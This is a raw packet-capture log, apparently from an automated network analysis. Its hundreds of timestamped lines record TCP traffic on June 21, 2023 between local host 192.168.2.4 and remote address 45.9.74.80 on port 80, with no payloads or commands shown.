                                                                                                  Jun 21, 2023 20:23:59.910734892 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.910734892 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.910747051 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.910777092 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.910783052 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.910806894 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.910835028 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.910835981 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.910866022 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.910893917 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.910923004 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.910932064 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.910932064 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.910950899 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.910979033 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.911006927 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.911020041 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.911036015 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.911062956 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.911091089 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.911106110 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.911106110 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.911117077 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.911148071 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.911149025 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.911178112 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.911237001 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.911259890 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.911267996 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.911295891 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.911324024 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.911350012 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.911376953 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.911403894 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.911405087 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.911405087 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.911428928 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.911432981 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.911463976 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.911659956 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.911715031 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.911715031 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.911715031 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.911742926 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.911772013 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.911798954 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.911804914 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.911828995 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.911890030 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.911897898 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.911927938 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.911947966 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.911967993 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.911988020 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.912007093 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.912028074 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.912054062 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.912074089 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.912103891 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.912106037 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.912106037 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.912152052 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.912179947 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.912189960 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.912189960 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.912208080 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.912236929 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.912276030 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.912305117 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.912308931 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.912332058 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.912359953 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.912388086 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.912399054 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.912399054 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.912415981 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.912442923 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.912470102 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.912519932 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.912519932 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.912530899 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.912559032 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.912586927 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.912615061 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.912642002 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.912647963 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.912647963 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.912669897 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.912693024 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.912700891 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.912753105 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.912777901 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.912803888 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.912827015 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.912827015 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.912830114 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.912858963 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.912888050 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.912914991 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.912941933 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.912970066 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.912996054 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.912996054 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.912997007 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.912997007 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.913024902 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.913053989 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.913079977 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.913106918 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.913132906 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.913158894 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.913186073 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.913213015 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.913216114 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.913216114 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.913216114 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.913216114 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.913239956 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.913269043 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.913271904 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.913296938 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.913324118 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.913352013 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.913408041 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.913434982 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.913461924 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.913489103 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.913510084 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.913510084 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.913510084 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.913510084 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.913515091 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.913597107 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.936743975 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.936808109 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.936834097 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.936861038 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.936887980 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.936916113 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.936944962 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.936970949 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.936995983 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.937004089 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.937004089 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.937004089 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.937024117 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.937051058 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.937077999 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.937093973 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.937125921 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.937211990 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.937241077 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.937268972 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.937294006 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.937416077 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.937417030 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.938590050 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.938617945 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.938782930 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.938781977 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.938810110 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.938944101 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.938970089 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.938977957 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.938997984 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.939023972 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.939074993 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.939088106 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.939101934 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.939127922 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.939133883 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.939177990 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.939197063 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.939203978 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.939249992 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.939253092 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.939349890 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.939376116 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.939402103 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.939435959 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.939440012 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.939467907 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.939538002 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.939547062 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.939547062 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.939568043 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.939594984 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.939641953 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.939665079 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.939687967 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.939692974 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.939692974 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.939713955 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.939738035 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.939764977 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.939790010 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.939815044 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.939841032 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.939866066 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.939889908 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.939914942 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.939914942 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.939914942 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.939914942 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.939914942 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.939940929 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.939965963 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.939989090 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.940015078 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.940040112 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.940052032 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.940052032 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.940064907 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.940089941 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.940114021 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.940161943 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.940186977 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.940210104 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.940233946 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.940233946 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.940253973 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.940299034 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.940310001 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.940329075 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.940356016 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.940411091 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.940463066 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.940511942 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.940530062 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.940530062 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.940563917 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.940572977 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.940604925 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.940630913 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.940656900 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.940684080 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.940711021 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.940737963 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.940766096 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.940792084 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.940797091 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.940797091 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.940797091 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.940818071 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.940846920 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.940875053 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.940903902 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.940907955 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.940907955 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.940932035 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.940958023 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.940984011 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.941016912 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.941016912 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.941021919 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.941051006 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.941077948 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.941104889 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.941129923 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.941129923 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.941133976 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.941162109 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.941188097 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.941243887 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.941243887 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.941289902 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.962321043 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.962356091 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.962383032 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.962409973 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.962436914 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.962464094 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.962472916 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.962472916 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.962491035 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.962518930 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.962544918 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.962547064 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.962574959 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.962601900 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.962629080 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.962635040 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.962635040 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.962656975 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.962683916 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.962691069 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.962709904 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.962739944 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.962766886 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.962794065 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.962816954 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.962816954 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.962820053 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.962851048 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.962872028 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.962898016 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.963887930 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.963923931 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.964138985 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.964171886 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.964202881 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.964231014 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.964258909 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.964258909 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.964304924 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.964342117 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.964370966 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.964379072 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.964400053 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.964411020 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.964540958 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.964587927 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.964617014 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.964643002 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.964670897 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.964791059 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.964792013 CEST4970480192.168.2.445.9.74.80
                                                                                                  Jun 21, 2023 20:23:59.965132952 CEST804970445.9.74.80192.168.2.4
                                                                                                  Jun 21, 2023 20:23:59.965239048 CEST804970445.9.74.80192.168.2.4
